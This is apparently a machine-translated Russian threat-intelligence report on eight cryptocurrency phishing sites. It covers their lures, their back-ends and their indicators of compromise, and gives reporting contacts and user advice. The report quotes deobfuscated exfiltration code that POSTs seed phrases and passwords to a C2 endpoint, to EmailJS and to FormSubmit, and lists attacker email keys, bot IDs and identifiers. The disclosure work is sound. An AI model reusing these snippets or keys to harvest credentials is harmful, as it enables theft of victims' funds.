
Анатомия криптовалютного фишинга:
Анализ 8 реальных атак
Мы перехватили фишинговый трафик в режиме реального времени, провели реверс-инжиниринг пяти программ, предназначенных для кражи семенных фраз, и отследили похищенные данные до ботов в [REDACTED], учетных записей EmailJS и бэкендов сервисов «фишинг как услуга».
Что мы обнаружили
Каждый день тысячи пользователей криптовалют теряют свои средства из-за фишинговых сайтов, которые внешне ничем не отличаются от легальных сервисов кошельков. Но что происходит позади Поддельная кнопка «Connect Wallet»? Куда на самом деле попадает ваша семенная фраза?
Мы перехватили актуальный HTTP-трафик с пяти действующих фишинговых сайтов, скачали их полный исходный код и отследили каждый конечный пункт передачи данных до его конечного пункта назначения. Это расследование раскрывает всю структуру современного криптофишинга — от приёмов социальной инженерии, заставляющих вас ввести свою семенную фразу, до бота в [REDACTED], который передаёт её злоумышленнику в режиме реального времени.
Все семенные фразы, приведенные в данной статье, являются тестовыми данными, сгенерированными случайным образом. В ходе данного расследования не произошло утечки реальных учетных данных. О всех сайтах было сообщено их соответствующим хостинг-провайдерам и отделам по борьбе со злоупотреблениями.
Универсальная схема атаки
Несмотря на различия в брендинге и внутренней инфраструктуре, все 8 фишинговых сайтов следуют абсолютно такая же психологическая воронка:
Ключевая мысль: анимация «Подключение...» всегда запрограммировано на сбой. В исходном коде сайта № 4 мы обнаружили const success = false — попытка подключения кошелька не предпринимается. Весь этот процесс предназначен исключительно для того, чтобы подтолкнуть жертв к заполнению формы «Подключиться вручную».
8 объектов: полная разбивка
Выдача себя за другого человека
Вымышленный «децентрализованный протокол» для проверки кошельков. Для обеспечения достоверности используются актуальные тикеры цен от CryptoCompare и ссылки на реальные блокчейн-браузеры (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano). На целевой странице представлены более 100 логотипов кошельков и описан процесс «проверки», состоящий из 3 этапов.
Двойная цепочка вывода информации
Самый сложный бэкенд из всех пяти — каждый украденный набор учетных данных проходит через два независимых канала одновременно:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on [REDACTED]
| |
| +--> [REDACTED] Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) Результаты анализа OSINT
| Показатель | Значение |
|---|---|
| Письмо от мошенника | Bestgrace309@gmail.com |
| Бот в [REDACTED] | @DewdropsTG_bot (ID: 7567323692) |
| Получатель в [REDACTED] | @metatech2 (Идентификатор в чате: 7350941887) |
| Бэкенд | [REDACTED] |
| Сервис EmailJS | service_d5qigxs / template_7bqxeaa |
| Скрытый домен | layerschain.in (из обфускации адреса электронной почты CF) |
| Отправленные сообщения | 1 824+ (по идентификатору сообщения в [REDACTED]) |
| Возраст домена | 2 дня (TLS: 25 марта 2026 г.) |
Адрес электронной почты злоумышленника был обнаружен в Комментарий на JavaScript внутри config.js: // Bestgrace309@gmail.com. Они забыли удалить его перед развертыванием. Кроме того, бэкенд ретранслятора [REDACTED] полностью открыт — без аутентификации и без ограничения скорости. При декодировании данных IANA #1910 data-cfemail помимо обфускации в HTML-коде, мы также обнаружили скрытый адрес электронной почты: support@layerschain.in, подключаясь к индийской и южноафриканской хостинговой инфраструктуре.
Выдача себя за другого человека
Идеальное до пикселя воспроизведение реальности Aqualibre (AQLA) страница миграции токенов. В коде HTML содержится тег метаданных, указывающий на источник: data-scrapbook-source="https://token.[REDACTED]/migration", с датой 19 ноября 2024 года.
Подход «Zero-Code»
Для этого атакующего необходимо полное отсутствие кода на стороне сервера. Форма отправляет данные непосредственно на Нестатический — легитимный бэкенд формы для статических сайтов. Каждая отправленная форма перенаправляется на электронную почту мошенника. Адрес электронной почты злоумышленника — никогда не отображается в исходном коде.
<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
IANA #1910 Pages: бесплатно. Un-static Forms: бесплатно. Домены не приобретались. Серверы не арендовались. Общая стоимость инфраструктуры: ноль долларов.
Выдача себя за другого человека
Субдомен содержит «safpal» — это намеренная орфографическая ошибка в слове [REDACTED], популярный аппаратный кошелек. Сайт маскируется под «Blockchain Wallet Rectification» и содержит 26 поддельных категорий проблем. Для анимации названий блокчейнов (Ethereum, BSC, Polygon…) используется библиотека Typed.js, а для придания сайту достоверности — тикер LiveCoinWatch.
Тот же комплект, тот же оператор?
Использует абсолютно такой же шаблон фишингового письма как объект № 2:
идентичный connect.html, идентичный wallets.html с более чем 60 логотипами, на одном и том же бэкенде Un-static (с разными идентификаторами форм — 6f1b82c3...da9943af). Наличие идентичного набора явно указывает на то, что один оператор, обслуживающий оба сайта.
Ошибки в коде: «Privay Policy» (пропущена буква «c»), «seperated» (должно быть «separated»), «Kestore» (пропущена буква «y»). В поле для ввода пароля используется type="text" вместо type="password".
Выдача себя за другого человека
Практически идеальный клон Сеть Flare portal — настоящий блокчейн EVM уровня 1 с протоколами FTSO и Data Connector. Включает в себя более 30 партнёров экосистемы, навигацию и брендинг. Фавиконы загружаются с домена, зарегистрированного по методу «типосквот»: [REDACTED] (в слове «mainnet» пропущено одно «n»).
Двойное резервирование EmailJS
Единственный сайт, на котором используется две отдельные учетные записи EmailJS одновременно для обеспечения отказоустойчивости в случае попытки ликвидации:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) Тема письма по каждому случаю кражи: "New Wallet Details from Flare".
HTML-код содержит Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Защита от PPC от Lunio, и Пиксель Twitter/X Ads. Злоумышленник запустил платная реклама чтобы привлечь жертв на фишинговый сайт и отфильтровать клики ботов. Это не хобби — это финансируемая операция с аналитикой и рекламными расходами.
Выдача себя за другого человека
Универсальный сервис «COIN NODE» / «Wallet Fix» (без указания конкретной марки). Авторские права «Wallet Fix 2022» — этому шаблону набора уже не менее 4 лет. Изображения размещены на [REDACTED] (WordPress на AWS).
«Фишинг как услуга»
Самая тревожная архитектура бэкенда: а Многопользовательский API на основе UUID:
POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+... Каждому мошеннику присваивается собственный конечный пункт с UUID. Центральный оператор обслуживает API, отслеживает кампании и, возможно, получает долю от похищенных средств. Это организованное хищение криптовалюты — модель «фишинга как услуги».
Связанная инфраструктура (почти не функционирует)
| Домен | Роль | Статус |
|---|---|---|
| [REDACTED] | API для экфильтрации данных | NXDOMAIN |
| [REDACTED] | Хостинг фавиконов | NXDOMAIN |
| [REDACTED] | Хостинг логотипов | NXDOMAIN |
| [REDACTED] | CDN для изображений | В режиме реального времени (AWS) |
Бэкенд не работает, но фронтенд по-прежнему работает на IANA #1910 Pages. Если злоумышленник повторно зарегистрирует [REDACTED], сайт сразу же возобновляет работу.
Выдача себя за другого человека
A двухстороннее мероприятие: общий «Центр поддержки» по адресу [REDACTED] с 15 вымышленными категориями выпусков и 39 брендами кошельков, а также Идеально точный клик-по-клику клон процесса регистрации в [REDACTED] в [REDACTED]-recovery.support размещенный на Replit — с возможностью выбора модели устройства, настройки PIN-кода и сеткой из 24 слов начальной фразы с настоящее автозаполнение BIP39.
Бэкэнд C2 для защиты от сканеров
Страница поддержки кошелька отправляет похищенные данные на [REDACTED]/log — настраиваемый сервер управления (C2) на базе nginx/Ubuntu, работающий за IANA #1910. Бэкенд намеренно отклоняет все запросы GET (возвращает ошибку 522 «таймаут»), отвечая только на запросы POST. Это означает, что сканеры URL-адресов, роботы Google Safe Browsing и исследователи в области безопасности, отправляющие запросы GET на этот конечный пункт, ничего не видят — сервер C2 выглядит неактивным.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.[REDACTED]",
allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
"[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} Клон [REDACTED] запускает отдельный бэкенд на Express.js непосредственно на Replit: POST /api/recovery-phrase сбор {deviceId, pin, phrase}. Он возвращает 400 {"error":"Invalid data provided"} при некорректных входных данных — подтверждая, что бэкенд работает и проходит активную валидацию украденные данные.
Результаты анализа OSINT
| Показатель | Значение |
|---|---|
| Фронтенд (кошелек) | [REDACTED] |
| Фронтенд ([REDACTED]) | [REDACTED]-recovery.support (34.111.179.208) |
| C2 Бэкенд | [REDACTED] → nginx/1.24.0 Ubuntu |
| IP-адреса C2 | 104.21.60.163 / 172.67.198.35 (IANA #1910) |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Регистратор | [REDACTED] ([REDACTED]-recovery.support) |
| Развернуто | 9 января 2026 г. (заголовок «Last-Modified») |
| Технологический стек | React + Vite + Tailwind v4.1 + Framer Motion |
Пакет JS объемом 466 КБ содержит полный список слов BIP39 при автозаполнении в режиме реального времени: 67 упоминаний термина «passphrase» и 39 — «mnemonic». Клон [REDACTED] предлагает жертвам пройти точно такой же процесс настройки, как и на подлинном устройстве [REDACTED] — это самая убедительная фишинговая страница за всё время данного расследования. apiKey поле в конфигурации предполагает, что многопользовательская архитектура PhaaS.
Выдача себя за другого человека
Универсальная «децентрализованная платформа запуска» с 21 категория приманок (стейкинг, миграция, KYC, розыгрыши, получение вознаграждений, восстановление активов, предпродажа, чеканка NFT, заблокированные аккаунты...) и Более 70 брендов кошельков — один из самых полных списков кошельков, с которыми нам доводилось сталкиваться. Характерная опечатка «Sychronize» (пропущена буква «n») выдаёт подделку.
Конвейер FormSubmit
Области применения FormSubmit.co — легальный сервис для отправки форм по электронной почте. Хеш конечной точки a2cf4131f1a5d39453c7c183df96f86f представляет собой MD5-хэш адреса электронной почты мошенника. Мы провели перебор сотен шаблонов адресов электронной почты в сервисах Gmail, Yahoo, Hotmail, ProtonMail, Yandex и [REDACTED] — не найдено. Мошенник использует необычный или сгенерированный случайным образом адрес электронной почты.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); Результаты анализа OSINT
| Показатель | Значение |
|---|---|
| Домен | [REDACTED] |
| Хеш FormSubmit | a2cf4131f1a5d39453c7c183df96f86f |
| Идентификатор кампании | DAPP — ДЕЦЕНТРАЛИЗОВАННОЕ ПРИЛОЖЕНИЕ |
| Набор FontAwesome | bdc3291137 (комплект № 112310842, бесплатная версия 6.7.2) |
| jQuery | 3.2.1 + 3.5.1 загружены одновременно |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (несовместимость) |
Набор FontAwesome bdc3291137 — FontAwesome может определить владельца учетной записи, связанной с этим идентификатором набора. Тег кампании DAPP DECENTRALIZED может появиться на других фишинговых сайтах, использующих тот же хеш FormSubmit. После кражи семенной фразы, поддельный QR-код и случайный 7-символьный референсный код отображается сообщение: «Обратитесь к администратору, указав свой уникальный реферальный код» — заставляя жертв ждать, вместо того чтобы проводить расследование.
Выдача себя за другого человека
Неизвестно — и фронтенд, и бэкенд находятся в автономном режиме. Судя по структуре полезной нагрузки, речь шла о программе, похищающей семенную фразу криптокошелька. Это Общедоступный хранилище IANA #1910 R2 (объектное хранилище, а не Pages) — это хорошо задокументированный вектор фишинга по данным Netskope, было выявлено более 5 000 вредоносных страниц, а объем трафика вырос в 61 раз.
Настройка для «скрипт-кидди»
Самый примитивная операция в этом наборе. Фразы-семена отправляются слово за словом к скрипту PHP, запущенному на домашнем компьютере или VPS, подключенном через бесплатный динамический DNS:
POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access Результаты анализа OSINT
| Показатель | Значение |
|---|---|
| Фронтенд | pub-519769e9eb634616b1746c2018641d56.r2.dev [ОФЛАЙН] |
| Бэкенд | [REDACTED] [NXDOMAIN] |
| Идентификатор ведра R2 | 519769e9eb634616b1746c2018641d56 |
| Провайдер DDNS | [REDACTED] / [REDACTED] (Цинциннати, штат Огайо) |
| DNS NS | ns10–[REDACTED] |
| Имя пользователя | mercifuljigga4real123 |
«Merciful» + «jigga» (прозвище Джей-Зи) + «4real» + «123» — явно личный ник, указывающий на приверженность хип-хоп-культуре. Не найдено на любой платформе, индексируемой поисковыми системами: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch или [REDACTED]. Вероятно, активен в [REDACTED], [REDACTED] или на игровых платформах под этим именем или его близкими вариантами. Имя файла fuc.php соответствует дерзкому стилю ручки.
7 способов кражи вашей семенной фразы
| Метод | Сайты | Как это работает | Скорость | Стоимость |
|---|---|---|---|---|
| Бот в [REDACTED] | #1 | Express.js на [REDACTED] использует прокси-сервер для подключения к Bot API. Мошенник мгновенно получает личное сообщение с учетными данными. | В режиме реального времени | $0 |
| EmailJS | #1, #4 | JavaScript на стороне клиента отправляет данные напрямую в API EmailJS, который доставляет их на электронную почту мошенника. | ~1 мин | $0 |
| Нестатические формы | #2, #3 | Стандартная HTML-форма с отправкой данных методом POST на легитимный сервис обработки форм, который пересылает отправленные данные по электронной почте. | ~1 мин | $0 |
| FormSubmit.co | #7 | jQuery AJAX на FormSubmit.co. Адрес электронной почты скрыт за хешем MD5. Кампания помечена тегом «DAPP DECENTRALIZED». | ~1 мин | $0 |
| Пользовательский API C2 | #6 | [REDACTED] отправляет запросы к API nginx/Express, расположенному за IANA #1910. Отбрасывает запросы GET (522) для обхода сканеров. Отвечает только на запросы POST. | В режиме реального времени | ~5 долларов в месяц |
| PHP + DDNS | #8 | PHP-скрипт на домашнем компьютере через бесплатный динамический DNS ([REDACTED]). Фраза-семена отправляется слово за словом. | В режиме реального времени | $0 |
| API PhaaS | #5 | Многопользовательский API на основе UUID. Центральный оператор управляет бэкендом, а мошенники арендуют конечные точки. | В режиме реального времени | Неизвестно |
7 тревожных признаков, по которым можно распознать любой фишинговый сайт
Если вы увидите любой Если вы обнаружили что-либо из перечисленного, немедленно закройте вкладку:
Настоящие подключения к кошелькам осуществляются с помощью протокола WalletConnect или браузерных расширений. При этом никогда не появляется ошибка «Сбой подключения», требующая ввести семенную фразу.
Каждый значок кошелька ведёт к одной и той же форме. Настоящий сервис интегрировал бы собственный SDK каждого кошелька.
Поддельная «Ошибка 503» или «Неизвестная ошибка», появляющаяся после отправки, является преднамеренной. Ваши данные уже были похищены — эта ошибка заставляет вас повторить попытку, используя другой кошелек.
Все 5 сайтов злоупотребляют бесплатным тарифом IANA #1910 Pages. Проверка личности не требуется. В 2025 году количество случаев фишинга с использованием IANA #1910 Pages выросло на 198 %.
Ни одна легитимная служба не требует всех трёх типов учетных данных. Эта форма с тремя вкладками — характерный признак фишингового набора.
Ни один из этих сайтов не загружается ethers.js, web3.js, или выполнять какие-либо RPC-вызовы. Это просто HTML-формы, маскирующиеся под децентрализованные приложения (dApps).
Бесплатный хостинг + бесплатные формы + бесплатный обмен сообщениями = полноценная фишинговая операция за 0 долларов. Если у сайта нет настоящего домена, будьте настороже.
Полная таблица IOC
Для служб безопасности, платформ аналитики угроз и лиц, сообщающих о злоупотреблениях:
Домены и инфраструктура
| Домен | Тип | Статус |
|---|---|---|
| [REDACTED] | Фронтенд для фишинга | В прямом эфире |
| [REDACTED] | Фронтенд для фишинга | В прямом эфире |
| [REDACTED] | Фронтенд для фишинга | В прямом эфире |
| [REDACTED] | Фронтенд для фишинга | В прямом эфире |
| [REDACTED] | Фронтенд для фишинга | В прямом эфире |
| [REDACTED] | Бэкенд реле TG | В прямом эфире |
| [REDACTED] | Ресурсы, связанные с типосквотингом | Неизвестно |
| layerschain.in | Связанный домен | DNS не работает |
| [REDACTED] | Бэкенд PhaaS | NXDOMAIN |
| [REDACTED] | Хост активов | NXDOMAIN |
| [REDACTED] | Хостинг логотипов | NXDOMAIN |
| [REDACTED] | CDN для изображений | В режиме реального времени (AWS) |
| [REDACTED] | Фронтенд для фишинга | В прямом эфире |
| [REDACTED]-recovery.support | Фишинг с использованием кошелька (Replit) | В прямом эфире |
| [REDACTED] | Бэкенд C2 (nginx/Ubuntu) | В прямом эфире |
| [REDACTED] | Коренной домен | 404 |
| [REDACTED] | Фронтенд для фишинга | В прямом эфире |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Фишинг (категория R2) | В автономном режиме |
| [REDACTED] | PHP-бэкенд (DDNS) | NXDOMAIN |
Учетные записи и идентификаторы
| Тип | Значение | Сайт |
|---|---|---|
| Электронная почта | Bestgrace309@gmail.com | #1 |
| Электронная почта (скрыта) | support@layerschain.in | #1 |
| Бот в [REDACTED] | @DewdropsTG_bot (7567323692) | #1 |
| Пользователь [REDACTED] | @metatech2 (7350941887) | #1 |
| EmailJS № 1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS № 2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS № 3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Нестатическая форма | c78173e2d991...94c3f76 | #2 |
| Нестатическая форма | 6f1b82c3ce55...da9943af | #3 |
| UUID PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Экземпляр рендеринга | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| MD5-хаш формы отправки | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Теги кампании | DAPP — ДЕЦЕНТРАЛИЗОВАННОЕ ПРИЛОЖЕНИЕ | #7 |
| Набор FontAwesome | bdc3291137 (комплект № 112310842) | #7 |
| Идентификатор ведра R2 | 519769e9eb634616b1746c2018641d56 | #8 |
| Имя пользователя/DDNS | mercifuljigga4real123 | #8 |
Куда сообщать о криптовалютном фишинге
| Сервис | О чём следует сообщать | Как |
|---|---|---|
| IANA #1910 | 7 контейнеров .pages.dev + 1 контейнер R2 | abuse.IANA #1910.com |
| Google Safe Browsing | Все фишинговые URL-адреса | Сообщить о фишинге |
| PhishTank | Все URL-адреса для списка заблокированных пользователей сообщества | [REDACTED] |
| EmailJS | 3 учетные записи, подвергшиеся злоупотреблению (идентификаторы сервиса указаны выше) | abuse@emailjs.com |
| Нестатический | 2 конечные точки формы | Связаться через [REDACTED] |
| [REDACTED] | Бэкенд ретранслятора [REDACTED] | Отправить форму о нарушении |
| [REDACTED] | @DewdropsTG_bot + @metatech2 | [REDACTED].org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Сообщить о нарушении в Google |
| Twitter/X | Рекламный аккаунт для продвижения сайта № 4 | X: Сообщить о нарушении в рекламе |
| FormSubmit.co | Хеш a2cf4131... (#7) | Отправить форму о нарушении |
| Replit | [REDACTED]-recovery.support (#6) | Сообщить о нарушении правил Replit |
| [REDACTED] | Регистратор сайта [REDACTED]-recovery.support | Отдел по борьбе со злоупотреблениями [REDACTED] |
| DNSExit | [REDACTED] | [REDACTED]: злоупотребление |
| FontAwesome | Набор bdc3291137 (#7) | Злоупотребление FontAwesome |
| Chainabuse | Все фишинговые кампании | [REDACTED] |
Как защитить себя
Ни один надежный сервис никогда не попросит вас ввести вашу семенную фразу на веб-сайте. Фразы-семена вводятся исключительно в официальное программное обеспечение кошелька при его восстановлении — ни в коем случае не на сторонних сайтах, предлагающих услуги «проверки», «синхронизации» или «восстановления».
Перед подключением любого кошелька:
- Убедитесь, что URL-адрес соответствует официальному домену. Проверьте данные SSL-сертификата.
- Настоящий WalletConnect использует QR-код или глубокую ссылку — но ни в коем случае не форму с семенной фразой.
- Если «подключение не удалось» и вам предложено ввести учетные данные вручную — это фишинг.
- Проверьте подозрительные URL-адреса на PhishTank или VirusTotal перед тем, как начать взаимодействие.
- Используйте аппаратный кошелек — он требует физического подтверждения каждой транзакции.
- Добавляйте в закладки официальные URL-адреса. Ни в коем случае не переходите по ссылкам из рекламных объявлений, личных сообщений или социальных сетей.
Таксономия криптофишинга
Программы, похищающие семенные фразы, — это лишь одна из категорий. Вот полная картина криптофишинга — в дальнейшем мы будем публиковать подробные обзоры по каждому типу.
Неприятная правда
Стоимость организации криптовалютной фишинговой атаки $0 и занимает менее 30 минут. Бесплатный хостинг, сервисы для создания форм, бесплатные боты для обмена сообщениями. Злоумышленник, стоящий за сайтом № 1, уже похитил учетные данные из 1 824+ пострадавших. Участок № 4 работает платная реклама в полном масштабе. Это не любительские забавы — это целая индустрия. Единственная защита — это осведомленность.
Помогите нам дать отпор
THE ENABLERS REGISTRY отслеживает и сообщает о криптовалютных фишинговых сайтах в режиме реального времени. Если вы наткнулись на подозрительный сайт, сообщите нам об этом — мы расследуем ситуацию и приложим все усилия, чтобы его закрыли.